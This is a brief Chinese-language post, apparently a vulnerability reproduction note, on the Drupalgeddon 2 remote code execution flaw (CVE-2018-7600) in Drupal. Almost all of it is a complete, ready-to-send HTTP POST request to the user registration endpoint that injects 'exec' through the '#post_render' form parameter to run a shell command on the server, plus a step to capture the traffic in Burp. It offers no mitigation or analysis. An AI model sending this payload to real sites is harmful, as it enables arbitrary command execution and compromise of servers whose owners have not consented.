Drupal Drupalgeddon 2远程执行代码漏洞(CVE-2018-7600)

漏洞复现:
1.参考a2u / CVE-2018-7600,我们可以向drupal发送以下请求:
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id

2.burp捉包

你可能感兴趣的:(Drupal Drupalgeddon 2远程执行代码漏洞(CVE-2018-7600))